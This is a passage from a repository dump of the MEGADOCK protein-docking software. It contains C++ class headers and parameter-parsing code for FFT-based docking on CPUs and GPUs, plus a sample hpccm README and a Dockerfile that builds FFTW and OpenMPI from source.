cout.flush();\n }\n virtual ~FFTProcess() {\n#ifdef DEBUG\n cout << \"Destructing FFTProcess.\\n\";\n#endif\n delete [] _FFT_rec_r;\n delete [] _FFT_rec_i;\n\n vector< vector<SortScore> > tmp1;\n vector<SortScore> tmp2;\n _Select.swap(tmp1);\n _Top.swap(tmp2);\n }\n virtual void alloc_array(const int &num_fft) = 0;\n virtual void receptor_fft(float *grid_r,float *grid_i) = 0;\n#ifdef CUFFT\n virtual void cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2) = 0;\n virtual void ligand_voxelization_on_gpu(float *theta, size_t myid2) = 0;\n virtual void ligand_data_transfer_gpu(float *grid_coord) = 0;\n#endif\n virtual void fft_memory_free() = 0;\n virtual void top_score_clean();\n virtual int num_fft() {\n return _Num_fft;\n }\n virtual void num_fft(const int &i) {\n _Num_fft = i;\n }\n virtual float top_score(const int &j) {\n return _Top[j].score;\n }\n virtual int top_index(const int &j,int k) {\n return _Top[j].index[k];\n }\n virtual void sort_index(float *fwork,int *iwork);\n};\n\n#endif\n" }, { "alpha_fraction": 0.6198296546936035, "alphanum_fraction": 0.6234793066978455, "avg_line_length": 27.842105865478516, "blob_id": "2053a85cbd84bb9883f0ffe10d777a78ee61ec9c", "content_id": "cf20d13095a96ebaaf19d87157a530030d701d1f", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1644, "license_type": "permissive", "max_line_length": 89, "num_lines": 57, "path": "/megadock-scfa20/docking_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : DockingTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef DockingTable_h\n#define DockingTable_h 1\n\n#include \"docking.h\"\n#include \"exec_logger.h\"\n#include \"parameter_table.h\"\n#include \"fft_process_table.h\"\n\nusing namespace std;\n\nclass DockingTable : public Docking<ParameterTable, FFTProcessTable>\n{\nprivate:\n ExecLogger *_exec_logger;\n float *_Mol_coord;\nprotected:\n virtual void maxsize_voxel();\n virtual void alloc_array(const int &maxatom, const int &nag, const size_t &ng3);\n virtual void create_voxel(Protein<ParameterTable> *rprotein);\n virtual void ligand_rotationz(float *theta);\npublic:\n DockingTable(ExecLogger *pexec_logger,Parallel *pparallel,ParameterTable *pparameter,\n Receptor<ParameterTable> *rreceptor,Ligand<ParameterTable> *rligand)\n : _exec_logger(pexec_logger),Docking(pparallel,pparameter,rreceptor,rligand) {\n#ifdef DEBUG\n cout << \"Constructing DockingTable.\\n\";\n#endif\n }\n virtual ~DockingTable() {\n#ifdef DEBUG\n cout << \"Destructing DockingTable.\\n\";\n#endif\n }\n virtual void initialize();\n virtual void rec_init();\n virtual void dockz();\n virtual void dock_memory_free();\n virtual void output();\n virtual void output_detail(); // for analysis\n virtual void output_calc_time_log(); // for analysis\n};\n\n#endif\n" }, { "alpha_fraction": 0.5757214426994324, "alphanum_fraction": 0.580491304397583, "avg_line_length": 27.33108139038086, "blob_id": "e3c593e3278395cfb8860dc7cb54f94592d80b4b", "content_id": "b3d6aa6a4fc19177c068d8598e6bc82ee9ab561e", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4193, "license_type": "permissive", "max_line_length": 147, "num_lines": 148, "path": "/megadock-scfa20/fft_process_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef FFTProcessPDB_h\n#define FFTProcessPDB_h 1\n\n#include \"cpu_time.h\"\n#include \"fft_process.h\"\n\nclass FFTProcessPDB : public FFTProcess<ParameterPDB>\n{\nprivate:\n#ifdef CUFFT\n //host side\n cufftHandle *cufft_plan;\n cufftResult *cufft_result;\n cufftComplex *CUFFTin_host;\n cufftComplex *CUFFTout_host;\n float **top_score_host;\n int **top_index_host;\n\n //device side\n cufftComplex **CUFFTin_gpu;\n cufftComplex **CUFFTout_gpu;\n float **_FFT_rec_r_gpu;\n float **_FFT_rec_i_gpu;\n float **top_score_gpu;\n int **top_index_gpu;\n\n float **radius_core2_gpu;\n float **radius_surf2_gpu;\n float **_Charge_gpu;\n float **xd_gpu;\n float **yd_gpu;\n float **zd_gpu;\n float **grid_coord_gpu;\n float **atom_coord_rotated_gpu;\n float **grid_r_gpu;\n float **grid_i_gpu;\n float **atom_coord_orig_gpu;\n float **mole_center_coord_gpu;\n float **ligand_rotation_angle_gpu;\n\n\n#endif /* CUFFT */\n\n fftwf_plan *plan_fftw_forward;\n fftwf_plan *plan_fftw_inverse;\n\n fftwf_complex *_FFTWin; \n fftwf_complex *_FFTWout;\n\n CPUTime *_cputime;\n vector< vector<SortScore> > _Select;\n int *_Current_rot_angle_num;\nprotected:\n virtual void alloc_fft();\npublic:\n virtual void fft3d(const float &theta, size_t myid2);\n FFTProcessPDB(CPUTime *pcputime,Parallel *pparallel,ParameterPDB *pparameter, Receptor<ParameterPDB> *preceptor, Ligand<ParameterPDB> *pligand)\n : _cputime(pcputime),FFTProcess(pparallel, pparameter, preceptor, pligand) {\n\n#ifdef DEBUG\n cout << \"Constructing FFTProcessPDB.\\n\";\n#endif\n //cout << \"FFTP const \"<< _parameter->_Num_sort <<endl; cout.flush();\n }\n virtual ~FFTProcessPDB() {\n#ifdef DEBUG\n cout << \"Destructing FFTProcessPDB.\\n\";\n#endif\n delete [] _Current_rot_angle_num;\n\n#ifdef CUFFT\n //host side\n delete [] cufft_plan;\n delete [] cufft_result;\n delete [] CUFFTin_host;\n delete [] CUFFTout_host;\n delete [] top_score_host;\n delete [] top_index_host;\n\n //device side\n delete [] CUFFTin_gpu;\n delete [] CUFFTout_gpu;\n delete [] _FFT_rec_r_gpu;\n delete [] _FFT_rec_i_gpu;\n delete [] top_score_gpu;\n delete [] top_index_gpu;\n\n delete [] radius_core2_gpu;\n delete [] radius_surf2_gpu;\n delete [] _Charge_gpu;\n delete [] xd_gpu;\n delete [] yd_gpu;\n delete [] zd_gpu;\n delete [] grid_coord_gpu;\n delete [] atom_coord_rotated_gpu;\n delete [] grid_r_gpu;\n delete [] grid_i_gpu;\n\n delete [] atom_coord_orig_gpu;\n delete [] mole_center_coord_gpu;\n delete [] ligand_rotation_angle_gpu;\n\n\n#endif\n\n delete [] plan_fftw_forward;\n delete [] plan_fftw_inverse;\n\n fftwf_free(_FFTWin);\n fftwf_free(_FFTWout);\n fftwf_cleanup();\n\n vector< vector<SortScore> > tmp1;\n vector<SortScore> tmp2;\n _Select.swap(tmp1);\n _Top.swap(tmp2);\n }\n virtual void alloc_array(const int &num_fft);\n virtual void receptor_fft(float *grid_r,float *grid_i);\n#ifdef CUFFT\n virtual void cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2);\n virtual void ligand_voxelization_on_gpu(float *theta, size_t myid2);\n virtual void ligand_data_transfer_gpu(float *grid_coord);\n#endif\n virtual void ligand_preparation(float *grid_r,float *grid_i, size_t myid2);\n virtual void convolution(size_t myid2);\n virtual void score_sort(size_t myid2);\n virtual void fft_memory_free();\n virtual void rotation_index(int i,const int &j) {\n _Current_rot_angle_num[i] = j;\n }\n};\n\n#endif\n" }, { "alpha_fraction": 0.5421428680419922, "alphanum_fraction": 0.5464285612106323, "avg_line_length": 24, "blob_id": "dffc6437292445d6d8e315b06eb7cce9a2e5bf11", "content_id": "58bfb4d0b3a719f8cc1a9598be05148aed78f2f6", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1400, "license_type": "permissive", "max_line_length": 89, "num_lines": 56, "path": "/megadock-scfa20/parameter_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ParameterTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ParameterTable_h\n#define ParameterTable_h 1\n\n#include \"parameter.h\"\n\nusing namespace std;\n\nclass ParameterTable : public Parameter\n{\nprivate:\n friend class ControlTable;\n friend class DockingTable;\n friend class FFTProcessTable;\n#ifdef MPI_DP\n string _RecPDB_file;\n string _LigPDB_file;\n int _IO_flag[3];\n\nprotected:\n virtual void pdb_step();\n#else\n string _Table_file;\n#endif\n\npublic:\n ParameterTable(Parallel *pparallel) : Parameter(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing ParameterTable.\\n\";\n#endif\n }\n virtual ~ParameterTable() {\n#ifdef DEBUG\n cout << \"Destructing ParameterTable.\\n\";\n#endif\n }\n virtual void process_args(int argc,char *argv[]);\n using Parameter::initialize;\n virtual void initialize(ParameterTable *pparameter);\n virtual void output_file_name(const string rec_file, const string lig_file);\n};\n\n#endif\n" }, { "alpha_fraction": 0.6421663165092468, "alphanum_fraction": 0.7234042286872864, "avg_line_length": 27.77777862548828, "blob_id": "bfb118af47a54643402247f65c978fd6b44c2b6c", "content_id": "095973a06934bb6aae81571610be40bd256ae4cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 517, "license_type": "permissive", "max_line_length": 129, "num_lines": 18, "path": "/sample/README.md", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "```sh\n# Sample Recipes\n\n# For general docker environment\nhpccm --recipe megadock_hpccm.py --format docker > Dockerfile\n\n\n# For TSUBAME3.0\n# target modules: cuda/8.0.61 openmpi/2.1.2-opa10.9\n\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.2 fftw=3.3.8 opa=True > singularity_ompi-2-1-2_opa.def\n\n\n# For ABCI\n# target modules: cuda/10.0/10.0.130 openmpi/2.1.6\n\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.6 fftw=3.3.8 ofed=True > singularity_ompi-2-1-6_ofed.def\n```" }, { "alpha_fraction": 0.5157516002655029, "alphanum_fraction": 0.521152138710022, "avg_line_length": 21.67346954345703, "blob_id": "4df809dfb7cdbb1f14f8ead60eaf7a042246162c", "content_id": "516753d1283cbe572e98c2048f0bb0e6bc53ea17", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1111, "license_type": "permissive", "max_line_length": 80, "num_lines": 49, "path": "/megadock-scfa20/parameter_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ParameterPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ParameterPDB_h\n#define ParameterPDB_h 1\n\n#include \"parameter.h\"\n\nusing namespace std;\n\nclass ParameterPDB : public Parameter\n{\nprivate:\n friend class ControlPDB;\n friend class DockingPDB;\n friend class FFTProcessPDB;\n string _RecPDB_file;\n string _LigPDB_file;\n int _IO_flag[3];\n\nprotected:\n virtual void pdb_step();\n\npublic:\n ParameterPDB(Parallel *pparallel) : Parameter(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing ParameterPDB.\\n\";\n#endif\n }\n virtual ~ParameterPDB() {\n#ifdef DEBUG\n cout << \"Destructing ParameterPDB.\\n\";\n#endif\n }\n virtual void process_args(int argc,char *argv[]);\n};\n\n#endif\n" }, { "alpha_fraction": 0.5615629553794861, "alphanum_fraction": 0.596092700958252, "avg_line_length": 31.33823585510254, "blob_id": "05ccddeff0fff23d2e827eac0f2e7b99a917d389", "content_id": "ba8cda9c6601ee35e6f1fc3e8197fa57509a9015", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 2201, "license_type": "permissive", "max_line_length": 176, "num_lines": 68, "path": "/sample/Dockerfile", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "# \n# HPC Base image\n# \n# Contents:\n# CentOS 7 (default)\n# CUDA version 10.0 (default)\n# Mellanox OFED version 4.6-1.0.1.1 ('ofed=True')\n# Intel OPA driver/library (upstream, 'opa=True')\n# GNU compilers (upstream)\n# FFTW version 3.3.8 (default)\n# OpenMPI version 3.1.3 (default)\n# \n\nFROM nvidia/cuda:10.0-devel-centos7 AS devel\n\nRUN yum install -y \\\n cuda-samples-10-0 \\\n ssh && \\\n rm -rf /var/cache/yum/*\n\n# GNU compiler\nRUN yum install -y \\\n gcc \\\n gcc-c++ \\\n gcc-gfortran && \\\n rm -rf /var/cache/yum/*\n\n# FFTW version 3.3.8\nRUN yum install -y \\\n file \\\n make \\\n wget && \\\n rm -rf /var/cache/yum/*\nRUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp ftp://ftp.fftw.org/pub/fftw/fftw-3.3.8.tar.gz && \\\n mkdir -p /var/tmp && tar -x -f /var/tmp/fftw-3.3.8.tar.gz -C /var/tmp -z && \\\n cd /var/tmp/fftw-3.3.8 && CC=gcc CXX=g++ F77=gfortran F90=gfortran FC=gfortran ./configure --prefix=/usr/local/fftw --enable-float --enable-sse2 && \\\n make -j$(nproc) && \\\n make -j$(nproc) install && \\\n rm -rf /var/tmp/fftw-3.3.8.tar.gz /var/tmp/fftw-3.3.8\nENV LD_LIBRARY_PATH=/usr/local/fftw/lib:$LD_LIBRARY_PATH\n\n# OpenMPI version 3.1.3\nRUN yum install -y \\\n bzip2 \\\n file \\\n hwloc \\\n make \\\n numactl-devel \\\n openssh-clients \\\n perl \\\n tar \\\n wget && \\\n rm -rf /var/cache/yum/*\nRUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://www.open-mpi.org/software/ompi/v3.1/downloads/openmpi-3.1.3.tar.bz2 && \\\n mkdir -p /var/tmp && tar -x -f /var/tmp/openmpi-3.1.3.tar.bz2 -C /var/tmp -j && \\\n cd /var/tmp/openmpi-3.1.3 && CC=gcc CXX=g++ F77=gfortran F90=gfortran FC=gfortran ./configure --prefix=/usr/local/openmpi --enable-mpi-cxx --with-cuda --without-verbs && \\\n make -j$(nproc) && \\\n make -j$(nproc) install && \\\n rm -rf /var/tmp/openmpi-3.1.3.tar.bz2 /var/tmp/openmpi-3.1.3\nENV LD_LIBRARY_PATH=/usr/local/openmpi/lib:$LD_LIBRARY_PATH \\\n PATH=/usr/local/openmpi/bin:$PATH\n\nCOPY ./megadock-scfa20 /workspace\n\nCOPY ./Makefile /workspace/Makefile\n\nRUN cd /workspace && \\\n make -j$(nproc)\n\n\n" }, { "alpha_fraction": 0.6028412580490112, "alphanum_fraction": 0.6071649193763733, "avg_line_length": 25.760330200195312, "blob_id": "10e10483c386213f692866f709f701dfdca7a944", "content_id": "819679638a29c5174253730968672d48c904e7b9", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3238, "license_type": "permissive", "max_line_length": 162, "num_lines": 121, "path": "/megadock-scfa20/fft_process_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef FFTProcessTable_h\n#define FFTProcessTable_h 1\n\n#include \"exec_logger.h\"\n#include \"fft_process.h\"\n\nclass FFTProcessTable : public FFTProcess<ParameterTable>\n{\nprivate:\n#ifdef CUFFT\n //host side\n cufftHandle cufft_plan;\n cufftResult cufft_result;\n cufftComplex *CUFFTin_host;\n cufftComplex *CUFFTout_host;\n float *top_score_host;\n int *top_index_host;\n\n cudaStream_t _cuda_stream;\n\n //device side\n cufftComplex *CUFFTin_gpu;\n cufftComplex *CUFFTout_gpu;\n float *_FFT_rec_r_gpu;\n float *_FFT_rec_i_gpu;\n float *top_score_gpu;\n int *top_index_gpu;\n\n float *radius_core2_gpu;\n float *radius_surf2_gpu;\n float *_Charge_gpu;\n float *xd_gpu;\n float *yd_gpu;\n float *zd_gpu;\n float *grid_coord_gpu;\n float *atom_coord_rotated_gpu;\n float *grid_r_gpu;\n float *grid_i_gpu;\n float *atom_coord_orig_gpu;\n float *mole_center_coord_gpu;\n float *ligand_rotation_angle_gpu;\n\n\n#else\n\n fftwf_plan plan_fftw_forward;\n fftwf_plan plan_fftw_inverse;\n\n fftwf_complex *_FFTWin; \n fftwf_complex *_FFTWout;\n\n#endif\n\n ExecLogger *_exec_logger;\n vector<SortScore> _Select;\n int _Current_rot_angle_num;\nprotected:\n virtual void alloc_fft();\npublic:\n virtual void fft3d(const float &theta);\n FFTProcessTable(ExecLogger *pexec_logger,Parallel *pparallel,ParameterTable *pparameter, Receptor<ParameterTable> *preceptor, Ligand<ParameterTable> *pligand)\n : _exec_logger(pexec_logger),FFTProcess(pparallel, pparameter, preceptor, pligand) {\n\n#ifdef DEBUG\n cout << \"Constructing FFTProcessTable.\\n\";\n#endif\n //cout << \"FFTP const \"<< _parameter->_Num_sort <<endl; cout.flush();\n }\n virtual ~FFTProcessTable() {\n#ifdef DEBUG\n cout << \"Destructing FFTProcessTable.\\n\";\n#endif\n\n#ifdef CUFFT\n delete [] CUFFTin_host;\n delete [] CUFFTout_host;\n#else\n\n fftwf_free(_FFTWin);\n fftwf_free(_FFTWout);\n fftwf_cleanup();\n\n#endif\n\n vector<SortScore> tmp1;\n vector<SortScore> tmp2;\n _Select.swap(tmp1);\n _Top.swap(tmp2);\n }\n virtual void alloc_array(const int &num_fft);\n virtual void receptor_fft(float *grid_r,float *grid_i);\n#ifdef CUFFT\n virtual void cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2);\n virtual void ligand_voxelization_on_gpu(float *theta, size_t myid2);\n virtual void ligand_data_transfer_gpu(float *grid_coord);\n#else\n virtual void ligand_preparation(float *grid_r,float *grid_i);\n virtual void convolution();\n virtual void score_sort();\n#endif\n virtual void fft_memory_free();\n virtual void rotation_index(const int &j) {\n _Current_rot_angle_num = j;\n }\n};\n\n#endif\n" }, { "alpha_fraction": 0.4004158675670624, "alphanum_fraction": 0.4117778241634369, "avg_line_length": 30.834514617919922, "blob_id": "991c4d574580ff822fb4697e79dc4a27a4400f9c", "content_id": "9031f6028b39561bf66d332b828dc05d3980328c", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13466, "license_type": "permissive", "max_line_length": 98, "num_lines": 423, "path": "/megadock-scfa20/parameter_table.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ParameterTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"parameter_table.h\"\n\n#include <string>\nusing namespace std;\n\n//============================================================================//\nvoid ParameterTable::process_args(int argc, char *argv[])\n//============================================================================//\n{\n#ifdef MPI_DP\n for( int i = 0 ; i < 3 ; i++ ) { //Receptor PDB, Ligand PDB, Outfile\n _IO_flag[i] = 0;\n }\n#endif\n\n optind = 1;\n int ch;\n\n std::string pdb_ext_r_b(\"_r_b.pdb\"); // for input support\n std::string pdb_ext_l_b(\"_l_b.pdb\");\n std::string pdb_ext_r_u(\"_r_u.pdb\");\n std::string pdb_ext_l_u(\"_l_u.pdb\");\n std::string detail_ext(\".detail\");\n std::string csv_ext(\".csv\");\n\n while( (ch = getopt(argc, argv,\n /*\n Line 1:input files\n Line 2:output\n Line 3:parameters\n Line 4:calculation options\n */\n#ifdef MPI_DP\n \"\\\n R:L:B:U:\\\n o:ON:t:E:\\\n a:b:e:d:F:v:\\\n Dhy:z:r:f:i:jkl:S:G:T:\"\n#else\n \"\\\n I:\\\n ON:t:E:\\\n a:b:e:d:F:v:\\\n Dhy:z:r:f:i:jkl:S:G:T:\"\n#endif\n )) != -1 ) {\n switch( ch ) {\n //-----------------------------------------------------------------\n // input PDB file -------------------------------------------------\n\n#ifdef MPI_DP\n case 'R':\n _RecPDB_file = optarg;\n _IO_flag[0] = 1;\n break;\n case 'L':\n _LigPDB_file = optarg;\n _IO_flag[1] = 1;\n break;\n case 'B': // for input support\n _RecPDB_file = optarg+pdb_ext_r_b;\n _IO_flag[0] = 1;\n _LigPDB_file = optarg+pdb_ext_l_b;\n _IO_flag[1] = 1;\n break;\n case 'U': // for input support\n _RecPDB_file = optarg+pdb_ext_r_u;\n _IO_flag[0] = 1;\n _LigPDB_file = optarg+pdb_ext_l_u;\n _IO_flag[1] = 1;\n break;\n\n //-----------------------------------------------------------------\n // output options -------------------------------------------------\n\n case 'o':\n _RLOut_file = optarg;\n _RLOut_file_detail = optarg+detail_ext;\n _RLOut_file_csv = optarg+csv_ext;\n if(_RLOut_file.length() > 4) {\n if(_RLOut_file.substr(_RLOut_file.length()-4)==\".out\") {\n _RLOut_file_detail = _RLOut_file.substr(0,_RLOut_file.length()-4)+detail_ext;;\n _RLOut_file_csv = _RLOut_file.substr(0,_RLOut_file.length()-4)+csv_ext;;\n }\n }\n _IO_flag[2] = 1;\n break;\n#else\n case 'I':\n _Table_file = optarg;\n break;\n#endif\n\n //-----------------------------------------------------------------\n // output options -------------------------------------------------\n\n case 'O':\n detail_output_flag = 1;\n break;\n case 'N':\n _Num_output = atoi(optarg);\n _Num_output_flag = 1;\n cout << \"# Number of output = \" << _Num_output << endl;\n break;\n case 't':\n _Num_sort = atoi(optarg);\n cout << \"# Set number of scores per one angle = \" << _Num_sort << endl;\n break;\n case 'E':\n calc_time_log_output_flag = atoi(optarg);\n break;\n case 'i':\n calc_id = optarg;\n break;\n\n //-----------------------------------------------------------------\n // setting parameters ---------------------------------------------\n\n case 'e':\n _Elec_ratio = atof(optarg);\n if (f1_flag == 1) {\n printf(\"Do not use -f 1 and -e option at the same time.\\n\");\n exit(1);\n }\n f1_flag = -1; // do not use rPSC only\n cout << \"# Set electric term ratio = \"<< _Elec_ratio << endl;\n break;\n case 'd':\n _ACE_ratio = atof(optarg);\n if (f1_flag == 1 || f2_flag == 1) {\n printf(\"Do not use -f 1 or 2 and -d option at the same time.\\n\");\n exit(1);\n }\n f1_flag = -1; // do not use rPSC only\n f2_flag = -1; // do not use rPSC and Elec function\n cout << \"# Set ACE term ratio = \" << _ACE_ratio << endl;\n break;\n case 'a':\n _rPSC_param_rec_core = atof(optarg); // Receptor core\n break;\n case 'b':\n _rPSC_param_lig_core = atof(optarg); // Ligand core\n break;\n case 'F':\n _Num_fft = atoi(optarg);\n _Num_grid = _Num_fft / 2;\n _Num_fft_flag = 1;\n cout << \"# Number of FFT N = \" << _Num_fft << endl;\n break;\n case 'v':\n grid_width = atof(optarg);\n cout << \"# Set voxel size = \" << grid_width << endl;\n break;\n\n //-----------------------------------------------------------------\n // setting calculation mode ---------------------------------------\n case 'T':\n _Num_thread_limit = atoi(optarg);\n if(_Num_thread_limit<1) {\n printf(\"Please set a positive number (Number of cores).\\n\");\n exit(1);\n }\n omp_set_num_threads(_Num_thread_limit);\n break;\n case 'G':\n _Num_GPU_limit = atoi(optarg);\n if(_Num_GPU_limit<0) {\n printf(\"Please set a non-negative number (Number of GPUs you want to use).\\n\");\n exit(1);\n }\n break;\n case 'f':\n _Score_func = atoi(optarg);\n cout << \"#Set score Function = \" << _Score_func << endl;\n assert( 1 <= _Score_func && _Score_func <= 3 );\n if(_Score_func == 1) {\n _Elec_ratio = 0.0;\n _ACE_ratio = 0.0;\n if (f1_flag == -1) {\n printf(\"Do not use -f 1 and -e/-d option at the same time.\\n\");\n exit(1);\n }\n f1_flag = 1;\n } else if(_Score_func == 2) {\n _ACE_ratio = 0.0;\n if (f2_flag == -1) {\n printf(\"Do not use -f 2 and -d option at the same time.\\n\");\n exit(1);\n }\n f2_flag = 1;\n }\n _Score_func = 3;\n break;\n case 'r':\n _Rotation_angle_set = atoi(optarg);\n if(_Rotation_angle_set == 54000) {\n cout << \"# Set 54,000 rotational angles (6 degree)\"<< endl;\n } else if(_Rotation_angle_set == 1) {\n cout << \"# Set 1 rotational angle (test mode)\"<< endl;\n } else if(_Rotation_angle_set == 3) {\n cout << \"# Set 3 rotational angle (test mode)\"<< endl;\n } else if(_Rotation_angle_set == 24) {\n cout << \"# Set 24 rotational angles (test mode)\"<< endl;\n } else if(_Rotation_angle_set == 360) {\n cout << \"# Set 360 rotational angles (test mode)\"<< endl;\n }\n break;\n case 'D':\n _Rotation_angle_set = 54000;\n cout << \"# Set 54,000 rotational angles (6 degree)\"<< endl;\n break;\n\n //-----------------------------------------------------------------\n // help -----------------------------------------------------------\n case 'j':\n tem_flag1 = 1;\n break;\n case 'k':\n tem_flag2 = 1;\n break;\n case 'S':\n lig_elec_serial_flag = atoi(optarg);\n break;\n case 'l':\n fft_base_set = atoi(optarg);\n break;\n\n case 'h':\n break;\n }\n }\n#ifdef MPI_DP\n pdb_step();\n#endif\n}\n\n#ifdef MPI_DP\n//============================================================================//\nvoid ParameterTable::pdb_step()\n//============================================================================//\n{\n if( !_IO_flag[0] ) {\n cerr << \"[ERROR] Receptor PDB file is not specified!!\" << endl;\n usage();\n exit(1);\n }\n\n if( !_IO_flag[1] ) {\n cerr << \"[ERROR] Ligand PDB file is not specified!!\" << endl;\n usage();\n exit(1);\n }\n\n if( !_IO_flag[2] ) {\n string rfile = _RecPDB_file;\n string lfile = _LigPDB_file;\n string ofile;\n int ipr;\n int ipl;\n\n while(1) {\n ipr = rfile.rfind(\"/\");\n\n if( ipr == (int) string::npos ) {\n break;\n } else {\n rfile = rfile.substr(ipr+1);\n }\n }\n\n ipr = rfile.rfind(\".\");\n rfile = rfile.substr(0,ipr);\n rfile = rfile + \"-\";\n\n while(1) {\n ipl = lfile.rfind(\"/\");\n\n if( ipl == (int) string::npos ) {\n break;\n } else {\n lfile = lfile.substr(ipl+1);\n }\n }\n\n ipl = lfile.rfind(\".\");\n lfile = lfile.substr(0,ipl);\n\n ofile = rfile + lfile + \".out\";\n _RLOut_file = ofile;\n ofile = rfile + lfile + \".detail\";\n _RLOut_file_detail = ofile;\n ofile = rfile + lfile + \".csv\";\n _RLOut_file_csv = ofile;\n }\n\n //cout << \"#Receptor = \" << _RecPDB_file << endl;\n //cout << \"#Ligand = \" << _LigPDB_file << endl;\n cout << \"# Output file = \" << _RLOut_file << endl;\n\n return;\n}\n#endif\n\n//============================================================================//\nvoid ParameterTable::initialize(ParameterTable *pparameter)\n//============================================================================//\n{\n#ifndef MPI_DP\n _Table_file = pparameter->_Table_file;\n#endif\n _RLOut_file = pparameter->_RLOut_file;\n _RLOut_file_detail = pparameter->_RLOut_file_detail; \n _RLOut_file_csv = pparameter->_RLOut_file_csv;\n calc_id = pparameter->calc_id;\n detail_output_flag = pparameter->detail_output_flag;\n calc_time_log_output_flag = pparameter->calc_time_log_output_flag;\n\n _Num_grid = pparameter->_Num_grid;\n _Num_fft = pparameter->_Num_fft;\n _Num_fft_flag = pparameter->_Num_fft_flag;\n _Num_atom_max = pparameter->_Num_atom_max;\n _Num_output = pparameter->_Num_output;\n _Num_output_flag = pparameter->_Num_output_flag;\n _Num_thread_limit = pparameter->_Num_thread_limit;\n _Num_GPU_limit = pparameter->_Num_GPU_limit;\n\n _Score_func = pparameter->_Score_func;\n _Num_sort = pparameter->_Num_sort;\n _Elec_ratio = pparameter->_Elec_ratio;\n _ACE_ratio = pparameter->_ACE_ratio;\n grid_width = pparameter->grid_width;\n ligand_max_edge = pparameter->ligand_max_edge;\n _Rotation_angle_set = pparameter->_Rotation_angle_set;\n fft_base_set = pparameter->fft_base_set;\n lig_elec_serial_flag = pparameter->lig_elec_serial_flag;\n fft_library_type = pparameter->fft_library_type;\n\n tem_flag1 = pparameter->tem_flag1;\n tem_flag2 = pparameter->tem_flag2;\n tem_flag3 = pparameter->tem_flag3;\n tem_flag4 = pparameter->tem_flag4;\n f1_flag = pparameter->f1_flag;\n f2_flag = pparameter->f2_flag;\n \n _Old_voxel_flag = pparameter->_Old_voxel_flag;\n _Grid_space_rec = pparameter->_Grid_space_rec;\n _Grid_space_lig = pparameter->_Grid_space_lig;\n \n _rPSC_param_rec_core = pparameter->_rPSC_param_rec_core;\n _rPSC_param_lig_core = pparameter->_rPSC_param_lig_core;\n\n _Num_rot_angles = pparameter->_Num_rot_angles;\n _Charmmr = pparameter->_Charmmr;\n _Charmmc = pparameter->_Charmmc;\n _ACE = pparameter->_ACE;\n\n\n _Zangle = new float[_Num_rot_angles*3];\n for( int i = 0 ; i < _Num_rot_angles*3 ; i++ ) {\n _Zangle[i] = pparameter->_Zangle[i];\n }\n}\n\n//============================================================================//\nvoid ParameterTable::output_file_name(const string rec_file, const string lig_file)\n//============================================================================//\n{\n string rfile = rec_file;\n string lfile = lig_file;\n string ofile;\n int ipr;\n int ipl;\n\n while(1) {\n ipr = 